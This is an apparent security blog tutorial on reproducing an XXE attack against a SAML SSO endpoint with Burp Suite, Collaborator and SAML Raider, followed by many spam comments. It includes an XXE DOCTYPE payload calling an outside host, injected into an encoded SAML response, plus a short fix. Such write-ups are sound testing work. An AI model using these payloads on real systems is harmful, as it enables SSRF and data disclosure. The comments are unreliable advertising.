Friday, January 13, 2017

SAML Security XML External Entity Attack

XML External Entity Attack(XXE) in SAML based SSO application

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts

We need collaborator server so that we can insert the unintended XML containing unauthorized url or file location on the server.Collaborator server wil as act as proxy server for intruder's URL.
It will intercept all the request cooming from original company's ip to collaborator server.

We need saml-raider extensionalso for capturing saml response if our request using the saml content.
Burp professional provides the saml-raider as extension .So we have to download saml-raider jar for the installed burp version  and import it through Burp Extender tab->Extensions tab ->load the raider jar

Suppose our affected url is:

Above url is used for logging in through a html(for example test.html provided by the SSO provider)  file which sends request 
to our url with a SAML response

suppose our test.html has below source code,It has only a submit button and a hidden param.
on click on submit button user is logged in using samlResponse param.
our aim is to corrupt the samlResponse param value and send a request to unintended server.

<form method="POST" action="">
<input type="hidden" name="SAMLResponse" value="aGVtYSIgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm" />
<input type="submit" name="Post Saml Response" value="Post Saml Response"/>

Step1: Download burp tool (we need burp professional for this)
Step2: Go to burp tool -> click on tab project options
Step3: Use the default collaborator server 
Step4: Click the "Run Health check" to confirm if the default collaborator server is running.
Step5: Click on Burp menu  and click on burp collaborator client
Step6: Intercept the request through burp proxy and go to repeater it will have raider tab copy the saml response,saml response is the XML file

Step7: Now we have to send our malicious Xml in the SAML response to the target URL

for example intruder's XML is

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://Collaborator Server's URL" >]>


Step8: To test that our affected server is making unintended request to intruder's server
We will pose default collaborator as the intruder's server url
Step9: To get out default collaborator server url go to burp collaborator client and click "copy to clip board button" it will copy the server's URL ,it should be someting like this 
Now replace it in the  XML chunck used for attack
Now XML will look like below

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM " " >]>


Now insert our SAML response between <foo> and </foo> tags  and post the saml response

for example intruder's new XML ready for attack will be something like this,url highlighted is the url acting as intruder's url

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM " " >]>

<samlp:Response ID="d4_kS-guM6wiWqkSLdWESYZ8DGv"
  IssueInstant="2016-12-21T19:15:11.418Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"></saml:Issuer>
    <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
  <saml:Assertion ID="YzZoJdNiWwkrRrz3pljoYUvX3Lb"
    IssueInstant="2016-12-21T19:15:11.480Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
    <ds:Signature xmlns:ds="">


As our Saml response in the original request was base64 encoded so Now we have created new XMl for SAML response with attack code inserted ,Now Copy the above SAML response and make it base 64 encoded using any online tool .

Step10: Now open our test.html to login through SSO intercept through burp tool
send it to repeater and now in the request param replace the existing value for samlResponse with newly encoded value.Now send the request

Step11:Expected result a request from our server ( is sent to unintended serer( as we have inserted a doctype with url in the post request.

Step12:We can verify it by refreshing the list in the burp collaborator client it shows that request from ip of our test company captured at collaborator server.

This way it is reproduced.

How to fix:

The safest way to prevent XXE is always to disable DTDs (External Entities) completely. Depending on the parser, the method should be similar to the following:

factory.setFeature("", true);

Note : delete the saml resposne
Copy the intruder's  xml replace the server name with collaborator client 
Now copy the xml and make it base 64 encoded using online tools
now copy this encrypted xml and  past in the value to post request parameter named "SAMLResponse".
Click the button go
Now if the attack is happneed then our collaborator server should get the request from the url where we have posted our request.



  1. nice article Facebook is the largest social media platform for contact with your family, friends, and other person who is a most impotent on your life .so
    Security Of facebook is very important for everyone. If you want your facebook a high security then check this site Tips To Ensure Security Of Your Facebook Account

  2. Islamic State's deadly drone program, U.S. officials say, but counter-terrorism experts warn that the terrorist group’s innovative Serious Security CCTV Bayswater


  4. I see some amazingly important and kept up to length of your strength searching for in your on the site security company

  5. I just got to this amazing site not long ago. I was actually captured with the piece of resources you have got here. Big thumbs up for making such wonderful blog page! security company

  6. Just saying thanks will not just be sufficient, for the fantasti c lucidity in your writing. I will instantly grab your rss feed to stay informed of any updates. security guards

  7. It has fully emerged to crown Singapore's southern shores and undoubtedly placed her on the global map of residential landmarks. I still scored the more points than I ever have in a season for GS. I think you would be hard pressed to find somebody with the same consistency I have had over the years so I am happy with that. security company

  8. نحن نمتلك مجموعة من الخبراء والمتخصصين فى شركة تنظيف بابها ونحن نستطيع التعامل مع كافة المساحات المختلفة فلا يهم ان كنت تمتلك منزل او فيلا فأن لدينا خبرات كبيرة تمكنا من تقديم خدماتنا على اكمل وجه ولدينا عمال وفنيين محترفين ولهم خبرات مختلفة نقدم ايضآ تنظيف لواجهات الشركات والفنادق. فكل ما تحتاجه من معدات واجهزة ومنظفات ذات جودة عالمية موجودة بشركتنا فنحن نسعى فقط لارضاء العميل أولآ واخيرآ

    شركة عزل خزانات بخميس مشيط
    شركة مكافحة حشرات بخميس مشيط
    شركة غسيل مجالس بخميس مشيط
    شركة غسيل خزانات المياه بخميس مشيط
    شركة غسيل خزانات بخميس مشيط
    شركة تنظيف شقق بابها

  9. Need To know that How to connect with my Netgear Wifi Extender in easy steps then just get in touch with us. Our technical community will be available for you help.

  10. The users using the Facebook dating service are often seen complaining about it, if in case it stops working then to get that fixed the user should get the Facebook application updated also the user should check the Wi-Fi connection, the application notifications should be enabled, the device should be given a restart and the application should be removed from the device and should be reinstalled on it the experts are available for help at +44-800-368-9067 if that is needed.
    Facebook Helpline Number UK.

  11. TouchTec is a leading company in region with more than 10 years of experience that provides Security, Safety and Surveillance Solutions with high assurance to improve security and efficiencies for identity management, access to critical facilities, intelligence analysis, guest worker programs, and national identity programs
    Cctv Camera In Mohali
    Cctv Camera In Chandigarh
    Cctv Camera Panchkula
    Cctv Camera Zirakpur

  12. Facebook is the best social media app, to change the name on the Facebook app, review the name standards. Then, open your Facebook app and tap and scroll down and tap on Settings and Privacy and after that, tap on Settings. Tap on Personal Information and after that, tap on Name. After that, enter your name and tap on Review Change and enter your password and tap on Save Changes. Call on +44-800-368-9067 to get connected with the technical experts for instant support.
    Facebook Help Number UK.

  13. Excellent information provided by you through this post. I follow all the mentioned information. Binance is an online exchange where users can trade cryptocurrencies. It supports most commonly traded cryptocurrencies. Binance provides a crypto wallet for traders to store their electronic funds. If you want to know how to invest in binance and How to withdraw money from binance, as many of us do not know about it clearly, then you can visit us at

  14. Just pure brilliance from you here. I have never expected something less than this from you and you have not disappointed me at all. I suppose you will keep the quality work going on. rastreo satelital de autos

  15. I found this BLOG informative which helps better assistance to cash app transfer failed. So, Do you need to know the reasons of the same i.e., why is my cash app payment failing Then, check out the official website of cash app desk. We provide accurate information to all our clients. The team specifically works thoroughly to provide seamless informative contents. Also, we are responsible for boosting the client's engagement.To know more, visit us at:

  16. I’m not sure where you are getting your information, but good topic. I needs to spend some time learning much more or understanding more. Thanks for great information I was looking for this info for my mission. close protection chauffeur London

  17. Good to become visiting your weblog again, it has been months for me. Nicely this article that i've been waited for so long. I will need this post to total my assignment in the college, and it has exact same topic together with your write-up. Thanks, good share. Application

  18. It's late finding this act. At least, it's a thing to be familiar with that there are such events exist. I agree with your Blog and I will be back to inspect it more in the future so please keep up your act. Application

  19. Sometimes people keep asking How to buy Dogecoin on Cash App but never try to notice the reason behind it. Many times the Cash App Transaction Failed because the device that was used for the transaction was not connected to a strong internet connection. So it is very important to check that you are connected to a very strong internet connection to avoid Cash App payment failed issue. It is recommended to connect your device to a strong Wi-Fi connection to overcome the Cash App transaction failed problem.Visit site

  20. For many a long time, tape was solely an analog medium onto
    which shifting pictures could possibly be both recorded or transferred.

    Here is my web-site :: Uncharted movie:

  21. Visit Spy Camera Solution at India’s best security cameras Online Shopping Store. Spy Camera India offers Secret Cameras, Mobile Jammer, Audio Voice Recorder, Magic Crds, Monitoring Software, GPS Tracker Device, and more (9999332499, 9999332099).

  22. İnstagram takipçi satın al! İnstagram takipçi sitesi ile takipçi satın al sende sosyal medyada fenomen olmaya bir adım at. Sende hemen instagram takipçi satın almak istiyorsan tıkla:

    1- takipçi satın al

    2- takipçi satın al

    3- takipçi satın al


  23. Thanks for sharing this informative blog. Nowadays, Security is more important because criminal activities are triggered by default. Call Now (9999332499, 9999332099) for Spy Camera in Delhi NCR. Buy now unique quality of Hidden Secret Cameras at reasonable price.